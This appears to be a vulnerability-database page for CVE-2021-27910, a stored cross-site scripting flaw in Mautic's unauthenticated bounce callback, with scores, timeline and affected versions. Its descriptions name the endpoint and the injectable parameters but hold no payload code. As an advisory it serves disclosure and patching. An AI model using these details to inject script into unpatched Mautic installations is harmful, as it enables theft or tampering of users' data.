// For flags

CVE-2021-27910

Stored XSS vulnerability on Bounce Management Callback

Severity Score

6.1
*CVSS v3.1

Exploit Likelihood

*EPSS

Affected Versions

*CPE

Public Exploits

0
*Multiple Sources

Exploited in Wild

-
*KEV

Decision

-
*SSVC
Descriptions

Insufficient sanitization / filtering allows for arbitrary JavaScript Injection in Mautic using the bounce management callback function. The values submitted in the "error" and "error_related_to" parameters of the POST request of the bounce management callback will be permanently stored and executed once the details page of an affected lead is opened by a Mautic user. An attacker with access to the bounce management callback function (identified with the Mailjet webhook, but it is assumed this will work uniformly across all kinds of webhooks) can inject arbitrary JavaScript Code into the "error" and "error_related_to" parameters of the POST request (POST /mailer/<product / webhook>/callback). It is noted that there is no authentication needed to access this function. The JavaScript Code is stored permanently in the web application and executed every time an authenticated user views the details page of a single contact / lead in Mautic. This means, arbitrary code can be executed to, e.g., steal or tamper with information.

Un saneamiento / filtrado insuficiente permite una inyección arbitraria de JavaScript en Mautic mediante la función bounce management callback. Los valores enviados en los parámetros "error" y "error_related_to" de la petición POST de la devolución de llamada de la administración de rebotes serán almacenados de forma permanente y serán ejecutados una vez que la página de detalles de un lead afectado sea abierta por un usuario de Mautic. Un atacante con acceso a la función de callback de administración de rebotes (identificada con el webhook de Mailjet, pero se supone que esto funcionará uniformemente en todos los tipos de webhooks) puede inyectar código JavaScript arbitrario en los parámetros "error" y "error_related_to" de la petición POST (POST /mailer//callback). Nótese que no se necesita autenticación para acceder a esta función. El código JavaScript es almacenado permanentemente en la aplicación web y es ejecutado cada vez que un usuario autenticado visualiza la página de detalles de un solo contacto / lead en Mautic. Esto significa que puede ser ejecutado un código arbitrario para, por ejemplo, robar o manipular información.

*Credits: Fixed by Zdeno Kuzmany, Webmecanik
CVSS Scores
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
Required
Scope
Changed
Confidentiality
Low
Integrity
Low
Availability
None
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
Required
Scope
Changed
Confidentiality
Low
Integrity
High
Availability
None
Attack Vector
Network
Attack Complexity
Medium
Authentication
None
Confidentiality
None
Integrity
Partial
Availability
None
* Common Vulnerability Scoring System
SSVC
  • Decision:-
Exploitation
-
Automatable
-
Tech. Impact
-
* Organization's Worst-case Scenario
Timeline
  • 2021-03-02 CVE Reserved
  • 2021-08-30 CVE Published
  • 2024-05-15 EPSS Updated
  • 2024-09-17 CVE Updated
  • ---------- Exploited in Wild
  • ---------- KEV Due Date
  • ---------- First Exploit
CWE
  • CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CAPEC
Affected Vendors, Products, and Versions
Vendor Product Version Other Status
Vendor Product Version Other Status <-- --> Vendor Product Version Other Status
Acquia
Search vendor "Acquia"
Mautic
Search vendor "Acquia" for product "Mautic"
< 3.3.4
Search vendor "Acquia" for product "Mautic" and version " < 3.3.4"
-
Affected
Acquia
Search vendor "Acquia"
Mautic
Search vendor "Acquia" for product "Mautic"
4.0.0
Search vendor "Acquia" for product "Mautic" and version "4.0.0"
alpha1
Affected
Acquia
Search vendor "Acquia"
Mautic
Search vendor "Acquia" for product "Mautic"
4.0.0
Search vendor "Acquia" for product "Mautic" and version "4.0.0"
beta
Affected
Acquia
Search vendor "Acquia"
Mautic
Search vendor "Acquia" for product "Mautic"
4.0.0
Search vendor "Acquia" for product "Mautic" and version "4.0.0"
rc
Affected